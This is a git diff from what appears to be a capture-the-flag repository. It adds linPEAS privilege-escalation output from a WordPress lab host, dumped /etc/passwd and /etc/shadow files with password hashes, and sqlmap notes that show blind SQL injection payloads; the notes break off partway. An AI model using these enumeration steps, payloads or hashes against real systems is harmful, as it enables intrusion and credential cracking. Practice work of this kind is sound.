+/var/cache/apache2/mod_cache_disk +/var/lib/php/sessions +/var/lib/wordpress/wp-content +/var/lib/wordpress/wp-content/index.php +/var/lib/wordpress/wp-content/languages +/var/lib/wordpress/wp-content/plugins +/var/lib/wordpress/wp-content/themes +/var/lib/wordpress/wp-content/uploads +/var/mail +/var/tmp +/var/www/yggdrasil +/var/www/yggdrasil/index.php +/var/www/yggdrasil/license.txt +/var/www/yggdrasil/readme.html +/var/www/yggdrasil/wp-activate.php +/var/www/yggdrasil/wp-admin +/var/www/yggdrasil/wp-admin/about.php +/var/www/yggdrasil/wp-admin/admin-ajax.php +/var/www/yggdrasil/wp-admin/admin-footer.php +/var/www/yggdrasil/wp-admin/admin-functions.php +/var/www/yggdrasil/wp-admin/admin-header.php +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/css/about-rtl.css +/var/www/yggdrasil/wp-admin/css/about-rtl.min.css +/var/www/yggdrasil/wp-admin/css/about.css +/var/www/yggdrasil/wp-admin/css/about.min.css +/var/www/yggdrasil/wp-admin/css/admin-menu-rtl.css +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/css/colors/_admin.scss +/var/www/yggdrasil/wp-admin/css/colors/_mixins.scss +/var/www/yggdrasil/wp-admin/css/colors/_variables.scss +/var/www/yggdrasil/wp-admin/css/colors/blue +/var/www/yggdrasil/wp-admin/css/colors/blue/colors-rtl.css +/var/www/yggdrasil/wp-admin/css/colors/blue/colors-rtl.min.css +/var/www/yggdrasil/wp-admin/css/colors/blue/colors.css +/var/www/yggdrasil/wp-admin/css/colors/blue/colors.min.css +/var/www/yggdrasil/wp-admin/css/colors/blue/colors.scss +/var/www/yggdrasil/wp-admin/css/colors/coffee +/var/www/yggdrasil/wp-admin/css/colors/coffee/colors-rtl.css +/var/www/yggdrasil/wp-admin/css/colors/coffee/colors-rtl.min.css +/var/www/yggdrasil/wp-admin/css/colors/coffee/colors.css +/var/www/yggdrasil/wp-admin/css/colors/coffee/colors.min.css +/var/www/yggdrasil/wp-admin/css/colors/coffee/colors.scss +/var/www/yggdrasil/wp-admin/css/colors/ectoplasm +/var/www/yggdrasil/wp-admin/css/colors/ectoplasm/colors-rtl.css +/var/www/yggdrasil/wp-admin/css/colors/ectoplasm/colors-rtl.min.css +/var/www/yggdrasil/wp-admin/css/colors/ectoplasm/colors.css +/var/www/yggdrasil/wp-admin/css/colors/ectoplasm/colors.min.css +/var/www/yggdrasil/wp-admin/css/colors/ectoplasm/colors.scss +/var/www/yggdrasil/wp-admin/css/colors/light +/var/www/yggdrasil/wp-admin/css/colors/light/colors-rtl.css +/var/www/yggdrasil/wp-admin/css/colors/light/colors-rtl.min.css +/var/www/yggdrasil/wp-admin/css/colors/light/colors.css +/var/www/yggdrasil/wp-admin/css/colors/light/colors.min.css +/var/www/yggdrasil/wp-admin/css/colors/light/colors.scss +/var/www/yggdrasil/wp-admin/css/colors/midnight +/var/www/yggdrasil/wp-admin/css/colors/midnight/colors-rtl.css +/var/www/yggdrasil/wp-admin/css/colors/midnight/colors-rtl.min.css +/var/www/yggdrasil/wp-admin/css/colors/midnight/colors.css +/var/www/yggdrasil/wp-admin/css/colors/midnight/colors.min.css +/var/www/yggdrasil/wp-admin/css/colors/midnight/colors.scss +/var/www/yggdrasil/wp-admin/css/colors/ocean +/var/www/yggdrasil/wp-admin/css/colors/ocean/colors-rtl.css +/var/www/yggdrasil/wp-admin/css/colors/ocean/colors-rtl.min.css +/var/www/yggdrasil/wp-admin/css/colors/ocean/colors.css +/var/www/yggdrasil/wp-admin/css/colors/ocean/colors.min.css +/var/www/yggdrasil/wp-admin/css/colors/ocean/colors.scss +/var/www/yggdrasil/wp-admin/css/colors/sunrise +/var/www/yggdrasil/wp-admin/css/colors/sunrise/colors-rtl.css +/var/www/yggdrasil/wp-admin/css/colors/sunrise/colors-rtl.min.css +/var/www/yggdrasil/wp-admin/css/colors/sunrise/colors.css +/var/www/yggdrasil/wp-admin/css/colors/sunrise/colors.min.css +/var/www/yggdrasil/wp-admin/css/colors/sunrise/colors.scss +/var/www/yggdrasil/wp-admin/css/common-rtl.css +/var/www/yggdrasil/wp-admin/css/common-rtl.min.css +/var/www/yggdrasil/wp-admin/css/common.css +/var/www/yggdrasil/wp-admin/css/common.min.css +/var/www/yggdrasil/wp-admin/css/customize-controls-rtl.css +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/custom-background.php +/var/www/yggdrasil/wp-admin/custom-header.php +/var/www/yggdrasil/wp-admin/customize.php +/var/www/yggdrasil/wp-admin/edit-comments.php +/var/www/yggdrasil/wp-admin/edit-form-advanced.php +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/includes/admin-filters.php +/var/www/yggdrasil/wp-admin/includes/admin.php +/var/www/yggdrasil/wp-admin/includes/ajax-actions.php +/var/www/yggdrasil/wp-admin/includes/bookmark.php +/var/www/yggdrasil/wp-admin/includes/class-automatic-upgrader-skin.php +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/index.php +/var/www/yggdrasil/wp-admin/install-helper.php +/var/www/yggdrasil/wp-admin/install.php +/var/www/yggdrasil/wp-admin/js +/var/www/yggdrasil/wp-admin/js/accordion.js +/var/www/yggdrasil/wp-admin/js/accordion.min.js +/var/www/yggdrasil/wp-admin/js/code-editor.js +/var/www/yggdrasil/wp-admin/js/code-editor.min.js +/var/www/yggdrasil/wp-admin/js/color-picker.js +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/js/widgets/custom-html-widgets.js +/var/www/yggdrasil/wp-admin/js/widgets/custom-html-widgets.min.js +/var/www/yggdrasil/wp-admin/js/widgets/media-audio-widget.js +/var/www/yggdrasil/wp-admin/js/widgets/media-audio-widget.min.js +/var/www/yggdrasil/wp-admin/js/widgets/media-gallery-widget.js +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/js/word-count.js +/var/www/yggdrasil/wp-admin/js/word-count.min.js +/var/www/yggdrasil/wp-admin/js/wp-fullscreen-stub.js +/var/www/yggdrasil/wp-admin/js/wp-fullscreen-stub.min.js +/var/www/yggdrasil/wp-admin/js/xfn.js +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/link-add.php +/var/www/yggdrasil/wp-admin/link-manager.php +/var/www/yggdrasil/wp-admin/link-parse-opml.php +/var/www/yggdrasil/wp-admin/link.php +/var/www/yggdrasil/wp-admin/load-scripts.php +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/maint/repair.php +/var/www/yggdrasil/wp-admin/media-new.php +/var/www/yggdrasil/wp-admin/media-upload.php +/var/www/yggdrasil/wp-admin/media.php +/var/www/yggdrasil/wp-admin/menu-header.php +/var/www/yggdrasil/wp-admin/menu.php +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/network/about.php +/var/www/yggdrasil/wp-admin/network/admin.php +/var/www/yggdrasil/wp-admin/network/credits.php +/var/www/yggdrasil/wp-admin/network/edit.php +/var/www/yggdrasil/wp-admin/network/freedoms.php +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/options-discussion.php +/var/www/yggdrasil/wp-admin/options-general.php +/var/www/yggdrasil/wp-admin/options-head.php +/var/www/yggdrasil/wp-admin/options-media.php +/var/www/yggdrasil/wp-admin/options-permalink.php +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/user/about.php +/var/www/yggdrasil/wp-admin/user/admin.php +/var/www/yggdrasil/wp-admin/user/credits.php +/var/www/yggdrasil/wp-admin/user/freedoms.php +/var/www/yggdrasil/wp-admin/user/index.php +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/users.php +/var/www/yggdrasil/wp-admin/widgets.php +/var/www/yggdrasil/wp-blog-header.php +/var/www/yggdrasil/wp-comments-post.php +/var/www/yggdrasil/wp-config-sample.php +/var/www/yggdrasil/wp-config.php +/var/www/yggdrasil/wp-content +/var/www/yggdrasil/wp-content/index.php +/var/www/yggdrasil/wp-content/plugins +/var/www/yggdrasil/wp-content/plugins/akismet +/var/www/yggdrasil/wp-content/plugins/akismet/.htaccess +/var/www/yggdrasil/wp-content/plugins/akismet/LICENSE.txt +/var/www/yggdrasil/wp-content/plugins/akismet/_inc +/var/www/yggdrasil/wp-content/plugins/akismet/_inc/akismet.css +/var/www/yggdrasil/wp-content/plugins/akismet/_inc/akismet.js +/var/www/yggdrasil/wp-content/plugins/akismet/_inc/form.js +/var/www/yggdrasil/wp-content/plugins/akismet/_inc/img +/var/www/yggdrasil/wp-content/plugins/akismet/akismet.php +/var/www/yggdrasil/wp-content/plugins/akismet/class.akismet-admin.php +/var/www/yggdrasil/wp-content/plugins/akismet/class.akismet-cli.php +/var/www/yggdrasil/wp-content/plugins/akismet/class.akismet-rest-api.php +/var/www/yggdrasil/wp-content/plugins/akismet/class.akismet-widget.php +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-content/plugins/akismet/views/activate.php +/var/www/yggdrasil/wp-content/plugins/akismet/views/config.php +/var/www/yggdrasil/wp-content/plugins/akismet/views/connect-jp.php +/var/www/yggdrasil/wp-content/plugins/akismet/views/enter.php +/var/www/yggdrasil/wp-content/plugins/akismet/views/get.php +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-content/plugins/akismet/wrapper.php +/var/www/yggdrasil/wp-content/plugins/hello.php +/var/www/yggdrasil/wp-content/plugins/index.php +/var/www/yggdrasil/wp-content/plugins/social-warfare +/var/www/yggdrasil/wp-content/plugins/social-warfare/README.md + +╔══════════╣ Interesting GROUP writable files (not in Home) (max 200) (T1574.009,T1574.010) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files + Group www-data: +/var/www/yggdrasil +/var/www/yggdrasil/wp-content/upgrade +/var/www/yggdrasil/wp-content/plugins/social-warfare +/var/www/yggdrasil/wp-content/plugins/social-warfare/assets +/var/www/yggdrasil/wp-content/plugins/social-warfare/assets/css +/var/www/yggdrasil/wp-content/plugins/social-warfare/assets/images +/var/www/yggdrasil/wp-content/plugins/social-warfare/assets/images/admin-options-page +/var/www/yggdrasil/wp-content/plugins/social-warfare/assets/fonts +/var/www/yggdrasil/wp-content/plugins/social-warfare/assets/js +/var/www/yggdrasil/wp-content/plugins/social-warfare/assets/js/post-editor +/var/www/yggdrasil/wp-content/plugins/social-warfare/assets/js/post-editor/src +/var/www/yggdrasil/wp-content/plugins/social-warfare/assets/js/post-editor/src/block +/var/www/yggdrasil/wp-content/plugins/social-warfare/assets/js/post-editor/dist +/var/www/yggdrasil/wp-content/plugins/social-warfare/languages +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/vendor +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/css +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/languages +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/Puc +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/Puc/v4 +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/Puc/v4p4 +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/Puc/v4p4/Vcs +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/Puc/v4p4/Theme +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/Puc/v4p4/DebugBar +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/Puc/v4p4/Plugin +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/js +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/examples +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/utilities +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/widgets +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/options +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/frontend-output +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/buttons-panel +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/admin/assets +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/admin/assets/css +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/admin/assets/img +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/admin/assets/js +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/social-networks + + +╔══════════╣ Writable root-owned executables I can modify (max 200) (T1574.009,T1574.010) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files +Writable root-owned executables Not Found + + + + ╔═════════════════════════╗ +════════════════════════════╣ Other Interesting Files ╠════════════════════════════ + ╚═════════════════════════╝ +╔══════════╣ .sh files in path (T1574.007) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scriptbinaries-in-path +/usr/bin/gettext.sh + +╔══════════╣ Executable files potentially added by user (limit 70) (T1083) + +╔══════════╣ Unexpected in /opt (usually empty) (T1083) +total 12 +drwxr-xr-x 3 root root 4096 May 6 11:17 . +drwxr-xr-x 22 root root 4096 May 6 11:17 .. +drwxr-xr-x 2 root root 4096 May 6 11:17 freya + +╔══════════╣ Unexpected in root (T1083) +/vmlinuz.old +/initrd.img +/initrd.img.old +/vmlinuz + +╔══════════╣ Modified interesting files in the last 5mins (limit 100) (T1083) +/tmp/out.txt +/tmp/cf31-probe-2649.py +/var/log/mail.info +/var/log/mail.log +/var/log/messages +/var/log/kern.log +/var/log/auth.log +/var/log/syslog +/var/log/daemon.log +/var/log/mail.warn +/var/log/user.log +/var/log/mail.err + +╔══════════╣ Syslog configuration (limit 50) (T1070.002) + + + +module(load="imuxsock") # provides support for local system logging +module(load="imklog") # provides kernel logging support + + + + + +$ActionFileDefaultTemplate RSYSLOG_TraditionalFileFormat + +$FileOwner root +$FileGroup adm +$FileCreateMode 0640 +$DirCreateMode 0755 +$Umask 0022 + +$WorkDirectory /var/spool/rsyslog + +$IncludeConfig /etc/rsyslog.d/*.conf + + + +auth,authpriv.* /var/log/auth.log +*.*;auth,authpriv.none -/var/log/syslog +daemon.* -/var/log/daemon.log +kern.* -/var/log/kern.log +lpr.* -/var/log/lpr.log +mail.* -/var/log/mail.log +user.* -/var/log/user.log + +mail.info -/var/log/mail.info +mail.warn -/var/log/mail.warn +mail.err /var/log/mail.err + +*.=debug;\ + auth,authpriv.none;\ + news.none;mail.none -/var/log/debug +*.=info;*.=notice;*.=warn;\ + auth,authpriv.none;\ + cron,daemon.none;\ + mail,news.none -/var/log/messages + +*.emerg :omusrmsg:* +╔══════════╣ Auditd configuration (limit 50) (T1070.002) +auditd configuration Not Found +╔══════════╣ Log files with potentially weak perms (limit 50) (T1070.002) + 139613 124 -rw-r----- 1 root adm 119231 May 8 15:32 /var/log/mail.info + 131539 0 -rw-r----- 1 root adm 0 May 6 11:17 /var/log/apt/term.log + 139606 124 -rw-r----- 1 root adm 119231 May 8 15:32 /var/log/mail.log + 131104 44 -rw-r----- 1 root adm 44815 May 8 15:32 /var/log/messages + 131103 12 -rw-r----- 1 root adm 10030 May 8 13:29 /var/log/debug + 131102 52 -rw-r----- 1 root adm 50305 May 8 15:31 /var/log/kern.log + 131105 40 -rw-r----- 1 root adm 33653 May 8 15:32 /var/log/auth.log + 131101 196 -rw-r----- 1 root adm 198946 May 8 15:32 /var/log/syslog + 131106 16 -rw-r----- 1 root adm 14400 May 8 15:32 /var/log/daemon.log + 139614 32 -rw-r----- 1 root adm 26379 May 8 15:32 /var/log/mail.warn + 140307 8 -rw-r----- 1 root adm 4400 May 8 15:32 /var/log/user.log + 139617 32 -rw-r----- 1 root adm 26308 May 8 15:32 /var/log/mail.err + +╔══════════╣ Files inside /home/www-data (limit 20) (T1083) + +╔══════════╣ Files inside others home (limit 20) (T1552.001) +/home/baldur/token.txt +/home/baldur/Uploads/todo.txt +/home/user/.bashrc +/home/user/.bash_login +/home/user/.profile +/home/user/.bash_logout +/var/www/html/index.html +/var/www/yggdrasil/wp-config-sample.php +/var/www/yggdrasil/wp-cron.php +/var/www/yggdrasil/wp-mail.php +/var/www/yggdrasil/wp-activate.php +/var/www/yggdrasil/index.php +/var/www/yggdrasil/xmlrpc.php +/var/www/yggdrasil/readme.html +/var/www/yggdrasil/license.txt +/var/www/yggdrasil/wp-trackback.php +/var/www/yggdrasil/wp-comments-post.php +/var/www/yggdrasil/wp-load.php +/var/www/yggdrasil/wp-signup.php +/var/www/yggdrasil/wp-includes/class-wp-block-parser.php + +╔══════════╣ Searching installed mail applications (T1114.001) +sendmail +sendmail-msp +sendmail-mta + +╔══════════╣ Mails (limit 50) (T1114.001) + +╔══════════╣ Backup folders (T1552.001) +drwxr-xr-x 2 root root 4096 May 8 13:29 /var/backups +total 36 +-rw-r--r-- 1 root root 12923 May 6 11:17 apt.extended_states.0 +-rw-r--r-- 1 root root 918 May 6 11:17 apt.extended_states.1.gz +-rw-r--r-- 1 root root 923 May 6 11:17 apt.extended_states.2.gz +-rw-r--r-- 1 root root 917 May 6 11:17 apt.extended_states.3.gz +-rw-r--r-- 1 root root 921 May 6 11:17 apt.extended_states.4.gz +-rw-r--r-- 1 root root 889 May 6 11:17 apt.extended_states.5.gz + + +╔══════════╣ Backup files (limited 100) (T1552.001) +-rw-r--r-- 1 root root 744 May 6 11:17 /etc/apt/sources.list.bak +-rw-r--r-- 1 root root 20 May 6 11:17 /etc/vmware-tools/tools.conf.old +-rw-r--r-- 1 root root 673 May 6 11:17 /etc/xml/xml-core.xml.old +-rw-r--r-- 1 root root 610 May 6 11:17 /etc/xml/catalog.old +-rwxr-xr-x 1 root root 37515 May 6 11:17 /usr/bin/wsrep_sst_mariabackup +-rwxr-xr-x 1 root root 18160712 May 6 11:17 /usr/bin/mariabackup +-rwxr-xr-x 1 root root 41671 May 6 11:17 /usr/bin/wsrep_sst_xtrabackup-v2 +-rwxr-xr-x 1 root root 21273 May 6 11:17 /usr/bin/wsrep_sst_xtrabackup +-rw-r--r-- 1 root root 57 May 6 11:17 /usr/share/sendmail/cf/siteconfig/uucp.old.arpa.m4 +-rw-r--r-- 1 root root 7867 May 6 11:17 /usr/share/doc/telnet/README.telnet.old.gz +-rw-r--r-- 1 root root 331845 May 6 11:17 /usr/share/doc/manpages/Changes.old.gz +-rw-r--r-- 1 root root 303 May 6 11:17 /usr/share/doc/hdparm/changelog.old.gz +-rw-r--r-- 1 root root 357 May 6 11:17 /usr/share/man/man1/wsrep_sst_xtrabackup-v2.1.gz +-rw-r--r-- 1 root root 348 May 6 11:17 /usr/share/man/man1/wsrep_sst_mariabackup.1.gz +-rw-r--r-- 1 root root 351 May 6 11:17 /usr/share/man/man1/wsrep_sst_xtrabackup.1.gz +-rw-r--r-- 1 root root 31664 May 6 11:17 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so +-rw-r--r-- 1 root root 159 May 6 11:17 /var/lib/sgml-base/supercatalog.old +-rw-r--r-- 1 root root 7896 May 6 11:17 /lib/modules/4.9.0-8-amd64/kernel/drivers/net/team/team_mode_activebackup.ko +-rw-r--r-- 1 root root 7896 May 6 11:17 /lib/modules/4.9.0-13-amd64/kernel/drivers/net/team/team_mode_activebackup.ko + +╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100) (T1005) +Found /etc/mail/access.db: regular file, no read permission +Found /etc/mail/aliases.db: regular file, no read permission +Found /var/lib/apt/listchanges-old.db: Berkeley DB (Hash, version 9, native byte-order) +Found /var/lib/apt/listchanges.db: Berkeley DB (Hash, version 9, native byte-order) +Found /var/www/yggdrasil/wp-content/plugins/social-warfare/assets/images/admin-options-page/Thumbs.db: Composite Document File V2 Document, Cannot read section info + + +╔══════════╣ Web files?(output limit) (T1005) +/var/www/: +total 16K +drwxr-xr-x 4 root root 4.0K May 6 11:17 . +drwxr-xr-x 12 root root 4.0K May 6 11:17 .. +drwxr-xr-x 2 root root 4.0K May 6 11:17 html +drwxrwxr-- 5 www-data www-data 4.0K May 6 11:17 yggdrasil + +/var/www/html: +total 20K +drwxr-xr-x 2 root root 4.0K May 6 11:17 . + +╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70) (T1564.001) +-rw-r--r-- 1 user user 211 May 6 11:17 /home/user/.bash_login +-rw-r--r-- 1 user user 211 May 6 11:17 /home/user/.bash_logout +-rw-r--r-- 1 root root 220 May 6 11:17 /etc/skel/.bash_logout +-rw------- 1 root root 0 May 6 11:17 /etc/.pwd.lock +-rw-r--r-- 1 root root 629 May 6 11:17 /usr/share/wordpress/wp-content/plugins/akismet/.htaccess +-rw-r--r-- 1 www-data www-data 403 May 6 11:17 /var/www/yggdrasil/wp-content/plugins/social-warfare/assets/js/post-editor/.editorconfig +-rw-r--r-- 1 www-data www-data 101 May 6 11:17 /var/www/yggdrasil/wp-content/plugins/social-warfare/assets/js/post-editor/.eslintignore +-rw-r--r-- 1 www-data www-data 5408 May 6 11:17 /var/www/yggdrasil/wp-content/plugins/social-warfare/assets/js/post-editor/.eslintrc.json +-rw-r--r-- 1 www-data www-data 271 May 6 11:17 /var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/.editorconfig +-rw-r--r-- 1 www-data www-data 629 May 6 11:17 /var/www/yggdrasil/wp-content/plugins/akismet/.htaccess +-rw-r--r-- 1 root root 0 May 8 13:29 /run/network/.ifstate.lock + +╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70) (T1552.001) +-rw-r--r-- 1 www-data www-data 159157 May 8 15:32 /tmp/out.txt +-rwxr-xr-x 1 www-data www-data 1053413 May 6 11:23 /tmp/linpeas.sh +-rw-r--r-- 1 www-data www-data 4331 May 8 15:31 /tmp/cf31-probe-2649.py + +╔══════════╣ Searching passwords in config PHP files (T1552.001) +/usr/share/wordpress/wp-admin/setup-config.php: $pwd = trim( wp_unslash( $_POST[ 'pwd' ] ) ); +/usr/share/wordpress/wp-admin/setup-config.php: define('DB_PASSWORD', $pwd); +/usr/share/wordpress/wp-admin/setup-config.php: define('DB_USER', $uname); +/usr/share/wordpress/wp-config-sample.php:define('DB_PASSWORD', 'password_here'); +/usr/share/wordpress/wp-config-sample.php:define('DB_USER', 'username_here'); +/usr/share/wordpress/wp-config.php: define('DB_USER', 'wordpress'); +/var/www/yggdrasil/wp-admin/setup-config.php: $pwd = trim( wp_unslash( $_POST['pwd'] ) ); + +╔══════════╣ Searching *password* or *credential* files in home (limit 70) (T1552.001) +/bin/systemd-ask-password +/bin/systemd-tty-ask-password-agent +/etc/mail/tls/sendmail-common.key +/etc/pam.d/common-password +/usr/lib/grub/i386-pc/legacy_password_test.mod +/usr/lib/grub/i386-pc/password.mod +/usr/lib/grub/i386-pc/password_pbkdf2.mod +/usr/lib/x86_64-linux-gnu/mariadb18/plugin/mysql_clear_password.so +/usr/lib/x86_64-linux-gnu/mariadb18/plugin/simple_password_check.so +/usr/share/man/man1/systemd-ask-password.1.gz +/usr/share/man/man1/systemd-tty-ask-password-agent.1.gz +/usr/share/man/man7/credentials.7.gz +/usr/share/man/man8/systemd-ask-password-console.path.8.gz +/usr/share/man/man8/systemd-ask-password-console.service.8.gz +/usr/share/man/man8/systemd-ask-password-wall.path.8.gz +/usr/share/man/man8/systemd-ask-password-wall.service.8.gz + #)There are more creds/passwds files in the previous parent folder + +/usr/share/pam/common-password.md5sums +/usr/share/wordpress/wp-admin/js/password-strength-meter.js +/usr/share/wordpress/wp-admin/js/password-strength-meter.min.js +/var/lib/pam/password +/var/www/yggdrasil/wp-admin/js/password-strength-meter.js +/var/www/yggdrasil/wp-admin/js/password-strength-meter.min.js + +╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs (T1552.001) + +╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs (T1083) + +╔══════════╣ Searching passwords inside logs (limit 70) (T1552.001) + +╔══════════╣ Checking all env variables in /proc/*/environ removing duplicates and filtering out useless env vars (T1552.007,T1082) +APACHE_LOCK_DIR=/var/lock/apache2 +APACHE_LOG_DIR=/var/log/apache2 +APACHE_PID_FILE=/var/run/apache2/apache2.pid +APACHE_RUN_DIR=/var/run/apache2 +APACHE_RUN_GROUP=www-data +APACHE_RUN_USER=www-data +LANG=C +LANGUAGE=en_US:en +OLDPWD=/home +PWD=/ +PWD=/tmp +PWD=/var/www/yggdrasil/wp-admin +SHLVL=1 +SHLVL=2 +SHLVL=3 +SHLVL=4 +_=/bin/bash +_=/bin/cat +_=/bin/dd +_=/bin/grep +_=/bin/sed +_=/usr/bin/sort +_=/usr/bin/tee +_=/usr/bin/tr +_=/usr/bin/xxd + + + ╔════════════════╗ +════════════════════════════════╣ API Keys Regex ╠════════════════════════════════ + ╚════════════════╝ +Regexes to search for API keys aren't activated, use param '-r' + + diff --git a/2026/usd_hackertag/freya/passwd b/2026/usd_hackertag/freya/passwd new file mode 100644 index 0000000..30dffbf --- /dev/null +++ b/2026/usd_hackertag/freya/passwd @@ -0,0 +1,31 @@ +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/usr/sbin/nologin +man:x:6:12:man:/var/cache/man:/usr/sbin/nologin +lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin +mail:x:8:8:mail:/var/mail:/usr/sbin/nologin +news:x:9:9:news:/var/spool/news:/usr/sbin/nologin +uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin +proxy:x:13:13:proxy:/bin:/usr/sbin/nologin +www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin +backup:x:34:34:backup:/var/backups:/usr/sbin/nologin +list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin +irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin +nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin +systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false +systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false +systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false +systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false +_apt:x:104:65534::/nonexistent:/bin/false +messagebus:x:105:109::/var/run/dbus:/bin/false +sshd:x:106:65534::/run/sshd:/usr/sbin/nologin +user:x:1000:1000:user,,,:/home/user:/bin/bash +mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false +ftp:x:108:112:ftp daemon,,,:/srv/ftp:/bin/false +smmta:x:109:114:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false +smmsp:x:110:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false +baldur:x:1001:1001::/home/baldur: diff --git a/2026/usd_hackertag/freya/shadow b/2026/usd_hackertag/freya/shadow new file mode 100644 index 0000000..8aab2c8 --- /dev/null +++ b/2026/usd_hackertag/freya/shadow @@ -0,0 +1,31 @@ +root:$6$mbIzpNIo$XElePqDmVNcUEhdU0nH1eQYvRvU1xQqQOM3F38Zceslqiz0tYTc1iAMxFXTt9TKlXsslPvLoLuMlE/n83iNce/:20579:0:99999:7::: +daemon:*:17569:0:99999:7::: +bin:*:17569:0:99999:7::: +sys:*:17569:0:99999:7::: +sync:*:17569:0:99999:7::: +games:*:17569:0:99999:7::: +man:*:17569:0:99999:7::: +lp:*:17569:0:99999:7::: +mail:*:17569:0:99999:7::: +news:*:17569:0:99999:7::: +uucp:*:17569:0:99999:7::: +proxy:*:17569:0:99999:7::: +www-data:*:17569:0:99999:7::: +backup:*:17569:0:99999:7::: +list:*:17569:0:99999:7::: +irc:*:17569:0:99999:7::: +gnats:*:17569:0:99999:7::: +nobody:*:17569:0:99999:7::: +systemd-timesync:*:17569:0:99999:7::: +systemd-network:*:17569:0:99999:7::: +systemd-resolve:*:17569:0:99999:7::: +systemd-bus-proxy:*:17569:0:99999:7::: +_apt:*:17569:0:99999:7::: +messagebus:*:17569:0:99999:7::: +sshd:*:17569:0:99999:7::: +user:$6$RGsJnnEH$mma2lPBOwYMp.3JZ/8dhUW4LZ6Mxee2d52wUiQyxMNOXjzUY5PG.SvfmkriTdHgn5WX7OsBo2AOiPCEEMtTN1.:17569:0:99999:7::: +mysql:!:20579:0:99999:7::: +ftp:*:20579:0:99999:7::: +smmta:*:20579:0:99999:7::: +smmsp:*:20579:0:99999:7::: +baldur:$6$/ScR4vLK$8XCAkPccvTAycL8fOxZagyk.vy54EqmdTcZQWQI.gzcygN6C5Iy35bMI65TZliwP6acrGpnhRBZKFrexoNGtu/:20579:0:99999:7::: diff --git a/2026/usd_hackertag/maxwell/notes.md b/2026/usd_hackertag/maxwell/notes.md new file mode 100644 index 0000000..b851335 --- /dev/null +++ b/2026/usd_hackertag/maxwell/notes.md @@ -0,0 +1,37 @@ +### sqlmap output + +sqlmap identified the following injection point(s) with a total of 5599 HTTP(s) requests: +--- +Parameter: product (GET) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause + Payload: product=-1399" OR 7840=7840-- CtiK + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + 